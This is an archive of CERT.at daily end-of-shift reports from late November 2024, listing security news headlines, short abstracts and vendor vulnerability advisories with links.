∗∗∗ --------------------------------------------- https://www.heise.de/-10178034 ∗∗∗ WebKitGTK and WPE WebKit Security Advisory WSA-2024-0007 ∗∗∗ --------------------------------------------- https://webkitgtk.org/security/WSA-2024-0007.html ∗∗∗ Synology-SA-24:27 DSM ∗∗∗ --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_24_27 ∗∗∗ Synology-SA-24:26 BeeDrive for desktop ∗∗∗ --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_24_26 ∗∗∗ Omada Identity: Stored Cross-Site Scripting in Omada Identity ∗∗∗ --------------------------------------------- https://sec-consult.com/de/vulnerability-lab/advisory/stored-xss-in-omada-i… ∗∗∗ F5: K000148716: REXML vulnerability CVE-2024-41123 ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000148716 ∗∗∗ F5: K000148692: Qt vulnerability CVE-2023-34410 ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000148692 ∗∗∗ F5: K000148690: Qt vulnerability CVE-2023-32573 ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000148690 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 26.11.2024
by Daily end-of-shift report 26 Nov '24

26 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Montag 25-11-2024 18:00 − Dienstag 26-11-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Hackers exploit critical bug in Array Networks SSL VPN products ∗∗∗ --------------------------------------------- Americas Cyber Defense Agency has received evidence of hackers actively exploiting a remote code execution vulnerability in SSL VPN products Array Networks AG and vxAG ArrayOS. --------------------------------------------- https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-bug… ∗∗∗ Matrix Unleashes A New Widespread DDoS Campaign ∗∗∗ --------------------------------------------- Aqua Nautilus researchers uncovered a new and widespread Distributed Denial-of-Service (DDoS) campaign orchestrated by a threat actor named Matrix. Triggered by activities detected on our honeypots, this investigation dives deep into Matrix’s methods, targets, tools, and overall goals. --------------------------------------------- https://blog.aquasec.com/matrix-unleashes-a-new-widespread-ddos-campaign ∗∗∗ Wake up and Smell the BitLocker Keys ∗∗∗ --------------------------------------------- >From this demonstration we can see that with a minimal set of tools and a small-time investment it is quite practical to access a drive encrypted with BitLocker. [..] This type of attack can be avoided by implementing a second factor for pre-boot authentication, either a user PIN and/or USB Startup Key. --------------------------------------------- https://blog.nviso.eu/2024/11/26/wake-up-and-smell-the-bitlocker-keys/ ∗∗∗ Detection Opportunities — EDR Silencer, EDRSandblast, Kill AV… ∗∗∗ --------------------------------------------- There are many ways to disable or modify security solutions which you can for. e.g test with at least 53 different Atomic Red Team as starting point, but today I would like to limit myself to a few tools that successful ransomware groups use within the top 20 ransomware groups for October 2024. --------------------------------------------- https://detect.fyi/detection-opportunities-edr-silencer-edrsandblast-kill-a… ∗∗∗ Web-Security: Mit Content Security Policy gegen Cross-Site Scripting, Teil 2 ∗∗∗ --------------------------------------------- Erweiterte CSP-Direktiven helfen dabei, Anwendungen effizient gegen Cross-Site Scripting zu schützen. --------------------------------------------- https://heise.de/-10175246 ∗∗∗ Graykey: Entschlüsselungswerkzeug kann teilweise iOS 18 aufsperren ∗∗∗ --------------------------------------------- Im Zusammenhang mit Apples neuem Reboot-Schutz vor Entsperrung sind Informationen aufgetaucht, was Forensikunternehmen mit aktuellen iPhones tun können. --------------------------------------------- https://heise.de/-10175639 ===================== = Vulnerabilities = ===================== ∗∗∗ Dell Wyse Management Suite: Angreifer können Sicherheitsmechanismen umgehen ∗∗∗ --------------------------------------------- Einer Warnmeldung zufolge sind unter anderem DoS-Attacken (CVE-2024-49595 "hoch") denkbar, außerdem können Angreifer nicht näher beschriebene Sicherheitsmechanismen umgehen (CVE-2024-49597 "hoch"). In beiden Fällen sind Attacken aus der Ferne möglich, Angreifer benötigen aber bereits hohe Nutzerrechte. --------------------------------------------- https://www.heise.de/-10176009 ∗∗∗ Trellix: Update dichtet Sicherheitslücken in Enterprise Security Manager ab ∗∗∗ --------------------------------------------- Auf konkrete Sicherheitslücken geht Trellix nicht weiter ein. Jedoch aktualisiert Trellix ESM 11.6.13 etwa Azul Java und geht damit mehrere nicht aufgelistete CVEs an. Ebenso bessert die mitgelieferte libcurl-Bibliothek zwei Sicherheitslücken aus (CVE-2023-38545, CVSS 9.8, Risiko "kritisch"; CVE-2023-38546, CVSS 3.7, niedrig). Auch im "Snow Service" lauerten zuvor zwei "Reverse Shell"-Schwachstellen (CVE-2024-1148, CVSS 9.8, kritisch; CVE-2024-11482 [noch nicht öffentlich]). --------------------------------------------- https://www.heise.de/-10176250 ∗∗∗ Wordpress-Plug-in Anti-Spam by Cleantalk gefährdet 200.000 Seiten ∗∗∗ --------------------------------------------- Nicht authentifizierte Angreifer können dadurch auf angreifbaren Wordpress-Instanzen beliebige Plug-ins installieren und aktivieren und somit am Ende beliebigen Code ausführen (CVE-2024-10542, CVSS 9.8, Risiko "kritisch"). --------------------------------------------- https://heise.de/-10175993 ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (pypy3), Fedora (chromium, cobbler, and libsoup3), Oracle (kernel), SUSE (glib2, govulncheck-vulndb, javapackages-tools, xmlgraphics-batik, xmlgraphics- commons, xmlgraphics-fop, libblkid-devel, opentofu, php8, postgresql, postgresql16, postgresql17, thunderbird, traefik, and ucode-intel), and Ubuntu (needrestart and rapidjson). --------------------------------------------- https://lwn.net/Articles/999744/ ∗∗∗ WordPress Plugin "WP Admin UI Customize" vulnerable to cross-site scripting ∗∗∗ --------------------------------------------- https://jvn.jp/en/jp/JVN87182660/ ∗∗∗ VMware: VMSA-2024-0022: VMware Aria Operations updates address multiple vulnerabilities(CVE-2024-38830, CVE-2024-38831, CVE-2024-38832, CVE-2024-38833, CVE-2024-38834) ∗∗∗ --------------------------------------------- https://support.broadcom.com/web/ecx/support-content-notification/-/externa… ∗∗∗ Mozilla Security Advisories November 26, 2024 ∗∗∗ --------------------------------------------- https://www.mozilla.org/en-US/security/advisories/ ∗∗∗ Splunk: SVD-2024-1102: Third-Party Package Updates in Splunk Machine Learning Toolkit - November 2024 ∗∗∗ --------------------------------------------- https://advisory.splunk.com//advisories/SVD-2024-1102 ∗∗∗ Splunk: SVD-2024-1101: Third-Party Package Updates in Python for Scientific Computing - November 2024 ∗∗∗ --------------------------------------------- https://advisory.splunk.com//advisories/SVD-2024-1101 ∗∗∗ Synology-SA-24:25 Surveillance Station ∗∗∗ --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_24_25 ∗∗∗ Synology-SA-24:15 BeeFiles ∗∗∗ --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_24_15 ∗∗∗ Hitachi Energy RTU500 Scripting Interface ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-331-05 ∗∗∗ Hitachi Energy MicroSCADA Pro/X SYS600 ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-331-04 ∗∗∗ F5: K000148713: libssh2 vulnerabilities CVE-2019-3858 and CVE-2019-3862 ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000148713 ∗∗∗ PHP Patches Multiple Vulnerabilities Including CVE-2024-8932 ∗∗∗ --------------------------------------------- https://thecyberthrone.in/2024/11/26/php-patches-multiple-vulnerabilities-i… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 25.11.2024
by Daily end-of-shift report 25 Nov '24

25 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Freitag 22-11-2024 18:00 − Montag 25-11-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ NAS nicht benutzbar: Qnap streicht fehlerhaftes Sicherheitsupdate ∗∗∗ --------------------------------------------- Besitzer von NAS-Geräten des Herstellers Qnap haben nach der Installation eines Patches Probleme sich anzumelden. Bislang hilft nur ein Downgrade. [..] Mittlerweile hat Qnap eine Stellungnahme zur Updateproblematik veröffentlicht. Demzufolge haben sie den Sicherheitspatch QTS 5.2.2.2950 build 20241114 nun repariert und wieder veröffentlicht. --------------------------------------------- https://heise.de/-10146878 ∗∗∗ Nearest Neighbor Attack: Angriff über WLAN des Nachbarn ∗∗∗ --------------------------------------------- Dass man über das Gast-WLAN des Ziels kritische Systeme erreichen konnte, lag daran, dass eines davon sowohl per drahtgebundenem Ethernet wie das Gast-WLAN erreichbar war. Damit fiel MFA weg, es handelte sich offenbar um eine Fehlkonfiguration. --------------------------------------------- https://heise.de/-10129358 ∗∗∗ Researchers Uncover Malware Using BYOVD to Bypass Antivirus Protections ∗∗∗ --------------------------------------------- Cybersecurity researchers have uncovered a new malicious campaign that leverages a technique called Bring Your Own Vulnerable Driver (BYOVD) to disarm security protections and ultimately gain access to the infected system. [..] The starting point of the attack is an executable file (kill-floor.exe) that drops the legitimate Avast Anti-Rootkit driver, which is subsequently registered as a service using Service Control (sc.exe) to perform its malicious actions. --------------------------------------------- https://thehackernews.com/2024/11/researchers-uncover-malware-using-byovd.h… ∗∗∗ Microsoft testing Windows 11 support for third-party passkeys ∗∗∗ --------------------------------------------- Microsoft is now testing WebAuthn API updates that add support for support for using third-party passkey providers for Windows 11 passwordless authentication. --------------------------------------------- https://www.bleepingcomputer.com/news/security/microsoft-testing-windows-11… ∗∗∗ Decrypting a PDF With a User Password, (Sat, Nov 23rd) ∗∗∗ --------------------------------------------- In diary entry "Analyzing an Encrypted Phishing PDF", I decrypted a phishing PDF document. Because the PDF was encrypted for DRM (owner password), I didn't have to provide a password. What happens if you try this with a PDF encrypted for confidentiality (user password), where a password is needed to open the document? --------------------------------------------- https://isc.sans.edu/diary/rss/31466 ∗∗∗ Finding vulnerabilities in ClipSp, the driver at the core of Windows’ Client License Platform ∗∗∗ --------------------------------------------- ClipSP (clipsp.sys) is a Windows driver used to implement client licensing and system policies on Windows 10 and 11 systems. Cisco Talos researchers have discovered eight vulnerabilities related to clipsp.sys ranging from signature bypass to elevation of privileges and sandbox escape:TALOS-2024-1964 (CVE-2024-38184)TALOS-2024-1965 (CVE-2024-38185) --------------------------------------------- https://blog.talosintelligence.com/finding-vulnerabilities-in-clipsp-the-dr… ∗∗∗ Dozens of Machines Infected: Year-Long NPM Supply Chain Attack Combines Crypto Mining and Data Theft ∗∗∗ --------------------------------------------- The package, @0xengine/xmlrpc, began its life as a “legitimate” XML-RPC implementation in October 2023, but strategically transformed into a malicious tool in later versions and has remained active through November of 2024. This discovery serves as a stark reminder that a package’s longevity and consistent maintenance history do not guarantee its safety. --------------------------------------------- https://checkmarx.com/blog/npm-supply-chain-attack-combines-crypto-mining-a… ∗∗∗ Secure Coding: CWE-377 – TOCTOU-Race-Conditions in den Griff bekommen ∗∗∗ --------------------------------------------- TOCTOU-Schwachstellen zählen zu den schwerwiegendsten in der Common Weakness Enumeration CWE-377 beschriebenen. [..] Der Schlüssel zur Vermeidung dieser Schwachstellen liegt in der Beseitigung der Lücke zwischen dem Zeitpunkt der Überprüfung und dem Zeitpunkt der Nutzung, typischerweise durch den Einsatz atomarer Dateierstellungsmethoden – etwa die von sicheren APIs wie File.createTempFile() oder Files.createTempFile(). --------------------------------------------- https://heise.de/-10081613 ∗∗∗ Phishing-Warnung: Kriminelle missbrauchen Black-Friday-Trubel ∗∗∗ --------------------------------------------- Im Phishingradar warnen die Verbraucherzentralen, dass seit Freitag betrügerische E-Mails im Umlauf sind, die zum Gegenstand haben, dass unbekannte Zugriffe auf das Konto zu einer vorübergehenden Sperrung des Kontos führe. --------------------------------------------- https://heise.de/-10143500 ∗∗∗ Advanced threat predictions for 2025 ∗∗∗ --------------------------------------------- Kasperskys Global Research and Analysis Team monitors over 900 APT (Advanced Persistent Threat) groups and operations. In this piece of KSB series, we review the advanced threat trends from the past year and offer insights into what we can expect in 2025. --------------------------------------------- https://securelist.com/ksb-apt-predictions-2025/114582/ ∗∗∗ Webinar: Internetkriminalität - Betrugsfallen & Fakes im Internet ∗∗∗ --------------------------------------------- Dieses Webinar informiert Sie über gängige Betrugsfallen im Internet (Abo-Fallen, Fake Shops, Kleinanzeigenbetrug, Scamming & Co.) und zeigt, wie Sie diese erkennen können. Nehmen Sie kostenlos teil: Montag, 9. Dezember 2024, 18:30 - 20:00 Uhr via zoom. --------------------------------------------- https://www.watchlist-internet.at/news/webinar-internetkriminalitaet-betrug… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (ansible, chromium, ghostscript, glib2.0, intel-microcode, and kernel), Fedora (dotnet9.0, needrestart, php, and python3.6), Oracle (cups, kernel, osbuild-composer, podman, python3.12-urllib3, squid, and xerces-c), Red Hat (buildah, edk2, gnome-shell, haproxy, kernel, kernel-rt, libvpx, pam, python3.11-urllib3, python3.12-urllib3, qemu-kvm, rhc-worker-script, squid:4, and tigervnc), Slackware (php), SUSE (chromedriver, chromium, dcmtk, govulncheck-vulndb, iptraf-ng, and traefik2), and Ubuntu (linux-oracle and openjdk-23). --------------------------------------------- https://lwn.net/Articles/999597/ ∗∗∗ UmweltOffice: SQL Injection in Siempelkamp NIS UmweltOffice <7.4.3 (SYSS-2024-074) ∗∗∗ --------------------------------------------- https://www.syss.de/pentest-blog/sql-injection-in-siempelkamp-nis-umweltoff… ∗∗∗ F5: K000148495: libssh vulnerability CVE-2023-1667 ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000148495 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 22.11.2024
by Daily end-of-shift report 22 Nov '24

22 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 21-11-2024 18:00 − Freitag 22-11-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Ransomgroup Helldown: Attacks on Zyxel Devices ∗∗∗ --------------------------------------------- SEC Consult has observed a rise of attacks on Zyxel firewalls over the past two months affecting Zyxel ATP firewall (version 5.38 and above - i.e. we have seen successful attacks also on fully patched Zyxel ATP version 5.39 firewalls). [..] We write this blogpost to highlight the need to remain vigilant and monitor activity on the Zyxel Firewalls, especially since there seems to be no official patch from the vendor as of the time of this blog post. --------------------------------------------- https://sec-consult.com/blog/detail/ransomgroup-helldown-attacks-on-zyxel-d… ∗∗∗ Angriffe auf Citrix-Sicherheitslücke beobachtet ∗∗∗ --------------------------------------------- In der vergangenen Woche hat Citrix Sicherheitslücken im Session Recording geschlossen. Nun haben IT-Forscher Angriffe darauf beobachtet. --------------------------------------------- https://www.heise.de/-10100614 ∗∗∗ Fintech Giant Finastra Investigating Data Breach ∗∗∗ --------------------------------------------- Finastra, which provides software and services to 45 of the worlds top 50 banks, notified customers of the security incident after a cybercriminal began selling more than 400 gigabytes of data purportedly stolen from the company. --------------------------------------------- https://it.slashdot.org/story/24/11/21/2043251/fintech-giant-finastra-inves… ∗∗∗ Heres what happens if you dont layer network security – or remove unused web shells ∗∗∗ --------------------------------------------- The US Cybersecurity and Infrastructure Agency often breaks into critical organizations' networks – with their permission, of course – to simulate real-world cyber attacks and thereby help improve their security. [..] In a Thursday blog post, the Agency (CISA) detailed the exercise and opined they "illuminate lessons learned for network defenders and software manufacturers about how to respond to and reduce risk." In other words: give it a read and learn from this critical infrastructure organization's mistakes – and the things it did well – to keep real criminals out of your IT environment. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2024/11/22/cisa_red_tea… ∗∗∗ Lateral Movement on macOS: Unique and Popular Techniques and In-the-Wild Examples ∗∗∗ --------------------------------------------- We uncover macOS lateral movement tactics, such as SSH key misuse and AppleScript exploitation. Strategies to counter this attack trend are also discussed. --------------------------------------------- https://unit42.paloaltonetworks.com/unique-popular-techniques-lateral-movem… ∗∗∗ UK drinking water supplies disrupted by record number of undisclosed cyber incidents ∗∗∗ --------------------------------------------- A record number of cyber incidents impacted Britain’s critical drinking water supplies this year without being publicly disclosed, according to information obtained by Recorded Future News. --------------------------------------------- https://therecord.media/uk-drinking-water-infrastructure-cyber-incident-rep… ∗∗∗ A Bag of RATs: VenomRAT vs. AsyncRAT ∗∗∗ --------------------------------------------- Remote access tools (RATs) have long been a favorite tool for cyber attackers, since they enable remote control over compromised systems and facilitate data theft, espionage, and continuous monitoring of victims. Among the well-known RATs are VenomRAT and AsyncRAT. [..] This comparison explores the core technical differences between VenomRAT and AsyncRAT by analyzing their architecture, capabilities, and tactics. --------------------------------------------- https://www.rapid7.com/blog/post/2024/11/21/a-bag-of-rats-venomrat-vs-async… ∗∗∗ Looking at the Attack Surfaces of the Kenwood DMX958XR IVI ∗∗∗ --------------------------------------------- In our previous Kenwood DMX958XR blog post, we detailed the internals of the Kenwood in-vehicle infotainment (IVI) head unit and provided annotated pictures of each PCB. In this post, we aim to outline the attack surface of the DMX958XR in the hopes of providing inspiration for vulnerability research. --------------------------------------------- https://www.thezdi.com/blog/2024/11/20/looking-at-the-attack-surfaces-of-th… ===================== = Vulnerabilities = ===================== ∗∗∗ QNAP Security Advisories 2024-11-23 ∗∗∗ --------------------------------------------- QNAP released 8 security advisories: 5x important, 3x moderate --------------------------------------------- https://www.qnap.com/en-us/security-advisories ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (postgresql-13, postgresql-15, and webkit2gtk), Fedora (libsndfile, microcode_ctl, and trafficserver), Mageia (kanboard, kernel, kmod-xtables-addons, kmod-virtualbox, and bluez, kernel-linus, opendmarc, and radare2), Oracle (.NET 9.0, bubblewrap and flatpak, buildah, expat, firefox, grafana, grafana-pcp, kernel, krb5, libsoup, libvpx, NetworkManager-libreswan, openexr, pcp, python3.11, python3.11-urllib3, python3.12, python3.9, squid, thunderbird, tigervnc, and webkit2gtk3), Red Hat (.NET 9.0, binutils, expat, grafana-pcp, kernel, libsoup, NetworkManager-libreswan, openexr, python3.11, python3.12, python39:3.9, squid, tigervnc, and webkit2gtk3), SUSE (chromedriver, cobbler, govulncheck-vulndb, and icinga2), and Ubuntu (linux-lowlatency, linux-lowlatency-hwe-6.8, python2.7, and zbar). --------------------------------------------- https://lwn.net/Articles/999102/ ∗∗∗ ZDI-24-1605: Adobe InDesign JP2 File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1605/ ∗∗∗ ZDI-24-1606: 7-Zip CopyCoder Infinite Loop Denial-of-Service Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1606/ ∗∗∗ ZDI-24-1613: Intel Driver & Support Assistant Log Folder Link Following Local Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1613/ ∗∗∗ SSA-354569 V1.0: Multiple Vulnerabilities in Palo Alto Networks Virtual NGFW on RUGGEDCOM APE1808 Devices ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/html/ssa-354569.html ∗∗∗ NVIDIA affected by a Critical vulnerability CVE-2024-0138 ∗∗∗ --------------------------------------------- https://thecyberthrone.in/2024/11/22/nvidia-affected-by-a-critical-vulnerab… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 21.11.2024
by Daily end-of-shift report 21 Nov '24

21 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 20-11-2024 18:00 − Donnerstag 21-11-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Fortinet VPN design flaw hides successful brute-force attacks ∗∗∗ --------------------------------------------- A design flaw in the Fortinet VPN servers logging mechanism can be leveraged to conceal the successful verification of credentials during a brute-force attack without tipping off defenders of compromised logins. --------------------------------------------- https://www.bleepingcomputer.com/news/security/fortinet-vpn-design-flaw-hid… ∗∗∗ Wegen Sicherheitslücke: D-Link drängt auf Entsorgung älterer Router ∗∗∗ --------------------------------------------- Mehrere D-Link-Router, von denen einige erst vor wenigen Monaten den EOL-Status erreicht haben, sind angreifbar. Patches gibt es nicht. --------------------------------------------- https://www.golem.de/news/wegen-sicherheitsluecke-d-link-draengt-auf-entsor… ∗∗∗ Lumma Stealer on the Rise: How Telegram Channels Are Fueling Malware Proliferation ∗∗∗ --------------------------------------------- Authored by: M. Authored by: M, Mohanasundaram and Neil Tyagi In today’s rapidly evolving cyber landscape, malware threats .. --------------------------------------------- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lumma-stealer-on-the-r… ∗∗∗ Azure Key Vault Tradecraft with BARK ∗∗∗ --------------------------------------------- This post details the existing and new functions in BARK that support adversarial tradecraft research relevant to the Azure Key Vault service. The latter part of the post shows an example of how a red team operator may use these commands during the course of an assessment. --------------------------------------------- https://posts.specterops.io/azure-key-vault-tradecraft-with-bark-24163abc8d… ∗∗∗ “Free Hugs” – What to be Wary of in Hugging Face – Part 2 ∗∗∗ --------------------------------------------- Enjoy Threat Modeling? Try Threats in Models! Previously… In part 1 of this 4-part blog, we discussed Hugging Face, the potentially dangerous trust relationship between Hugging Face users and the ReadMe file, exploiting users who .. --------------------------------------------- https://checkmarx.com/blog/free-hugs-what-to-be-wary-of-in-hugging-face-par… ∗∗∗ New Report Reveals Hidden Risks: How Internet-Exposed Systems Threaten Critical Infrastructure ∗∗∗ --------------------------------------------- A new Censys report found 145,000 exposed ICSs and thousands of insecure human-machine interfaces (HMIs), providing attackers with an accessible path to disrupt critical operations. Real-world examples underscore the danger, with Iranian and Russian-backed hackers exploiting HMIs to manipulate water systems in Pennsylvania and Texas. GreyNoise research .. --------------------------------------------- https://www.greynoise.io/blog/new-report-reveals-hidden-risks-how-internet-… ∗∗∗ Finding Bugs in Chrome with CodeQL ∗∗∗ --------------------------------------------- This blog post discusses how to use a static analysis tool called CodeQL to search for vulnerabilities in Chrome. --------------------------------------------- https://bughunters.google.com/blog/5085111480877056/finding-bugs-in-chrome-… ∗∗∗ Spelunking in Comments and Documentation for Security Footguns ∗∗∗ --------------------------------------------- Join us as we explore seemingly safe but deceptively tricky ground in Elixir, Python, and the Golang standard library. We cover officially documented, or at least previously discussed, code functionality that could unexpectedly introduce vulnerabilities. Well-documented behavior is not always what it appears! --------------------------------------------- https://blog.includesecurity.com/2024/11/spelunking-in-comments-and-documen… ∗∗∗ Azure Detection Engineering: Log idiosyncrasies you should know about ∗∗∗ --------------------------------------------- We share a few inconsistencies found in Azure logs which make detection engineering more challenging. --------------------------------------------- https://tracebit.com/blog/azure-detection-engineering-log-idiosyncrasies-yo… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (kernel, NetworkManager-libreswan, and openssl), Fedora (chromium and llvm-test-suite), Mageia (thunderbird), and Ubuntu (linux-aws-6.8, linux-azure, linux-azure-6.8, linux-oracle-6.8,, linux-azure, and ruby2.7). --------------------------------------------- https://lwn.net/Articles/998949/ ∗∗∗ Progress Kemp LoadMaster OS Command Injection Vulnerability ∗∗∗ --------------------------------------------- FortiGuard network sensors detect attack attempts targeting the Progress Kemp LoadMaster. Successful exploitation of the CVE-2024-1212 vulnerability allows unauthenticated remote attackers to access the system through the management interface, potentially leading to data breaches, service disruptions, or further attacks --------------------------------------------- https://fortiguard.fortinet.com/outbreak-alert/kemp-loadmaster-os-command-i… ∗∗∗ ZDI-24-1532: 7-Zip Zstandard Decompression Integer Underflow Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1532/ ∗∗∗ Drupal core - Moderately critical - Gadget chain - SA-CORE-2024-008 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-core-2024-008 ∗∗∗ Drupal core - Moderately critical - Gadget chain - SA-CORE-2024-007 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-core-2024-007 ∗∗∗ Drupal core - Critical - Cross Site Scripting - SA-CORE-2024-005 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-core-2024-005 ∗∗∗ Drupal core - Moderately critical - Access bypass - SA-CORE-2024-004 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-core-2024-004 ∗∗∗ Drupal core - Moderately critical - Cross Site Scripting - SA-CORE-2024-003 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-core-2024-003 ∗∗∗ Drupal core - Moderately critical - Cross Site Scripting - SA-CORE-2024-003 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-core-2024-003 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 20.11.2024
by Daily end-of-shift report 20 Nov '24

20 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Dienstag 19-11-2024 18:00 − Mittwoch 20-11-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Bigger and badder: how DDoS attack sizes have evolved over the last decade ∗∗∗ --------------------------------------------- If we plot the metrics associated with large DDoS attacks observed in the last 10 years, does it show a straight, steady increase in an exponential curve that keeps becoming steeper, or is it closer to a linear growth? Our analysis found the growth is not linear but rather is exponential, with the slope varying depending on the metric (rps, pps or bps). --------------------------------------------- https://blog.cloudflare.com/bigger-and-badder-how-ddos-attack-sizes-have-ev… ∗∗∗ Kein Angriff auf Idev-Portal: Destatis weist Schuld für Datenleck von sich ∗∗∗ --------------------------------------------- Das Statistische Bundesamt hat sein Idev-Portal untersucht. Von Hackern erbeutete Daten sollen bei den meldenden Unternehmen abgeflossen sein. --------------------------------------------- https://www.golem.de/news/kein-cyberangriff-auf-meldesystem-destatis-weist-… ∗∗∗ Inside the Threat: Ein Blick hinter die Kulissen zur Abwehr einer aktiven Bedrohung ∗∗∗ --------------------------------------------- Früherkennung und proaktive Untersuchung können einen Ransomware-Angriff im Keim ersticken. Ein aktueller realer Fall, zeigt, wie es funktioniert. --------------------------------------------- https://sec-consult.com/de/blog/detail/inside-the-threat-ein-blick-hinter-d… ∗∗∗ Decades-Old Security Vulnerabilities Found in Ubuntus Needrestart Package ∗∗∗ --------------------------------------------- Multiple decade-old security vulnerabilities have been disclosed in the needrestart package installed by default in Ubuntu Server (since version 21.04) that could allow a local attacker to gain root privileges without requiring user .. --------------------------------------------- https://thehackernews.com/2024/11/decades-old-security-vulnerabilities.html ∗∗∗ Yubikey-Seitenkanal: Weitere Produkte für Cloning-Attacke anfällig ∗∗∗ --------------------------------------------- Die Seitenkanal-Lücke EUCLEAK wurde auch als "Yubikey-Cloning-Attacke" bekannt. Das BSI re-zertifiziert aktualisierte Produkte, die betroffen waren. --------------------------------------------- https://www.heise.de/news/EUCLEAK-Weitere-Produkte-fuer-Cloning-Attacke-anf… ∗∗∗ Threat Assessment: Ignoble Scorpius, Distributors of BlackSuit Ransomware ∗∗∗ --------------------------------------------- Explore this assessment on cybercrime group Ignoble Scorpius, distributors of BlackSuit ransomware. Since May 2023, operations have increased —affecting critical sectors. --------------------------------------------- https://unit42.paloaltonetworks.com/threat-assessment-blacksuit-ransomware-… ∗∗∗ Looking at the Internals of the Kenwood DMX958XR IVI ∗∗∗ --------------------------------------------- For the upcoming Pwn2Own Automotive contest, a total of four in-vehicle infotainment (IVI) head units have been selected as targets. One of these is the double DIN Kenwood DMX958XR. This unit offers a variety of .. --------------------------------------------- https://www.thezdi.com/blog/2024/11/18/looking-at-the-internals-of-the-kenw… ∗∗∗ Critical Vulnerabilities in vCenter Server Exploited in the Wild ∗∗∗ --------------------------------------------- CVE CVE-2024-38813CVE-2024-38812 Affected Products VMware vCenter Server VMware Cloud Foundation Exploitation Broadcom has confirmed exploitation of these vulnerabilities[1]. The CVE has not been .. --------------------------------------------- https://www.truesec.com/hub/blog/critical-vulnerabilities-in-vcenter-server… ∗∗∗ Malicious QR Codes: How big of a problem is it, really? ∗∗∗ --------------------------------------------- QR codes are disproportionately effective at bypassing most anti-spam filters. Talos discovered two effective methods for defanging malicious QR codes, a necessary step to make them safe for consumption. --------------------------------------------- https://blog.talosintelligence.com/malicious_qr_codes/ ∗∗∗ Hackers Exploit Misconfigured Jupyter Servers for Illegal Sports Streaming ∗∗∗ --------------------------------------------- Aqua Nautilus’ research reveals hackers are leveraging vulnerable and misconfigured Jupyter Notebook servers to steal live sports streams. --------------------------------------------- https://hackread.com/hackers-exploit-misconfigured-jupyter-servers-sports-s… ∗∗∗ Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 ∗∗∗ --------------------------------------------- It'll be no surprise that 2024, 2023, 2022, and every other year of humanities existence has been tough for SSLVPN appliances. Anyhow, there are new vulnerabilities (well, two of them) that are being exploited in the Palo Alto Networks .. --------------------------------------------- https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve… ∗∗∗ Defending Your Directory: An Expert Guide to Mitigating Pass-the-Hash Attacks in Active Directory ∗∗∗ --------------------------------------------- In our latest technical blog series, our DFIR team are highlighting the most prominent Active Directory (AD) threats, describing the tell-tale signs that your AD might be at risk, and give experienced insight into the best prevention and mitigation strategies to shore up your AD security and bolster your digital identity protection. --------------------------------------------- https://www.nccgroup.com/us/research-blog/defending-your-directory-an-exper… ∗∗∗ Let’s Encrypt: Ten Years ∗∗∗ --------------------------------------------- Vital personal and business information flows over the Internet more frequently than ever, and we don’t always know when it’s happening. It’s clear at this point that encrypting is something all of us should be doing. Then why don’t we use TLS (the successor to SSL) everywhere? Every browser in every device supports it. Every server in every data center supports it. 